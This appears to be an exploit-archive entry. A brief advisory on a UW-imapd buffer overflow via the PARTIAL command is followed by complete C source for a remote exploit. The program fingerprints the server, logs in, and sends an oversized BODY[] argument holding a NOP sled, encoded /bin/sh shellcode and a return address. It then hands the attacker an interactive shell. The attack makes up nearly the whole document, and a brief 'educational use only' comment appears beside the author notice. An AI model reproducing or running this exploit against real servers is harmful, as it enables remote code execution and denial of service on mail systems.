source: Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition. This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315. /* * * * uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4 * * Copyright (C) 2002 Christophe "korty" Bailleux <[email protected]> * Copyright (C) 2002 Kostya Kortchinsky <[email protected]> * * All Rights Reserved * The copyright notice above does not evidence any * actual or intended publication of such source code. * * Usage: ./wu-imap host user password shellcode_addressr alignement * * Demonstration values for Linux: * * (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0 * (Redhat 7.2) ./uw-imap localhost test test1234 0xbffff760 0 * * THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER * * The code is dirty...but we like dirty things :) * And it works very well :) * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <string.h> #include <netdb.h> #define GOOD_EXIT 0 #define ERROR_EXIT 1 #define DEFAULT_PROTOCOL 0 #define SEND_FLAGS 0 #define RECV_FLAGS 0 char sc[]= "\xeb\x38" /* jmp 0x38 */ "\x5e" /* popl %esi */ "\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */ "\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */ "\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */ "\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */ "\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xc3\xff\xff\xff" /* call -0x3d */ "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */ int imap_send(int s, char *buffer) { int result = GOOD_EXIT; if (send(s, buffer, strlen(buffer), SEND_FLAGS) < 0) result = ERROR_EXIT; return result; } int imap_receive(int s, char *buffer, int size) { int result = GOOD_EXIT; int char_recv; int tot_recv = 0; bzero(buffer, size); do { char_recv = recv(s, &buffer[tot_recv], size - tot_recv, RECV_FLAGS); if (char_recv > 0) tot_recv += char_recv; } while ((char_recv > 0) && (strchr(buffer, 13) == NULL)); if (char_recv < 0) result = ERROR_EXIT; return result; } #define BANNER "pwd ; uname -a" int interact( int fd ) { fd_set fds; ssize_t ssize; char buffer[ 666 ]; write( fd, BANNER"\n", sizeof(BANNER) ); while ( 12 != 42 ) { FD_ZERO( &fds ); FD_SET( STDIN_FILENO, &fds ); FD_SET( fd, &fds); select( fd + 1, &fds, NULL, NULL, NULL ); if ( FD_ISSET(STDIN_FILENO, &fds) ) { ssize = read( STDIN_FILENO, buffer, sizeof(buffer) ); if ( ssize < 0 ) { return( -1 ); } if ( ssize == 0 ) { return( 0 ); } write( fd, buffer, ssize ); } if ( FD_ISSET(fd, &fds) ) { ssize = read( fd, buffer, sizeof(buffer) ); if ( ssize < 0 ) { return( -1 ); } if ( ssize == 0 ) { return( 0 ); } write( STDOUT_FILENO, buffer, ssize ); } } return( -1 ); } void usage(char *cmd) { printf("Usage: %s host user pass shellcode_addr align\n", cmd); printf("Demo: %s localhost test test1234 0xbffffa40 0\n", cmd); exit(0); } int main(int argc, char *argv[]) { struct sockaddr_in server; struct servent *sp; struct hostent *hp; int s, i , ret, align; int blaw = 1024; char *user, *passwd; char imap_info[4096]; char imap_login[4096]; char imap_query[4096]; char buffer[2048]; int exit_code = GOOD_EXIT; if (argc != 6) usage(argv[0]); user = argv[2]; passwd = argv[3]; ret = strtoul(argv[4], NULL, 16); align = atoi(argv[5]); if ((hp = gethostbyname(argv[1])) == NULL) exit_code = ERROR_EXIT; if ((exit_code == GOOD_EXIT) && (sp = getservbyname("imap2", "tcp")) == NULL) exit_code = ERROR_EXIT; if (exit_code == GOOD_EXIT) { if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0) return exit_code = ERROR_EXIT; bzero((char *) &server, sizeof(server)); bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length); server.sin_family = hp->h_addrtype; server.sin_port = sp->s_port; if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0) exit_code = ERROR_EXIT; else { printf(" [1;34mV�rification de la banni�re : [0m\n"); if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } printf("%s", imap_info); if (strstr(imap_info, "IMAP4rev1 200") == NULL) { printf(" [1;32mService IMAPd non reconnu ... [0m\n"); shutdown(s, 2); close(s); return exit_code; } if ((exit_code = imap_send(s, "x CAPABILITY\n")) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } printf(" [1;34mV�rification des options du service : [0m\n"); if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } printf("%s", imap_info); if (strstr(imap_info, " IMAP4 ") == NULL) { printf(" [1;32mService IMAPd non vuln�rable ... [0m\n"); shutdown(s, 2); close(s); return exit_code; } printf(" [1;31mService IMAPd vuln�rable ... [0m\n"); sprintf(imap_login, "x LOGIN %s %s\n", user, passwd); if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } printf("%s", imap_info); if ((exit_code = imap_send(s, "x SELECT Inbox\n")) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } printf("%s", imap_info); memset(buffer, 0x90, sizeof(buffer)); memcpy(buffer + 512, sc, strlen(sc)); for (i = blaw + align ; i < 1096; i +=4) *(unsigned int *)(&buffer[i]) = ret; *(unsigned int *)(&buffer[i + 1]) = 0; sprintf(imap_query, "x PARTIAL 1 BODY[%s] 1 1\n", buffer); if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } if ((exit_code = imap_send(s, "x LOGOUT\n")) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) == ERROR_EXIT) { shutdown(s, 2); close(s); return exit_code; } } } i = interact( s ); return exit_code; }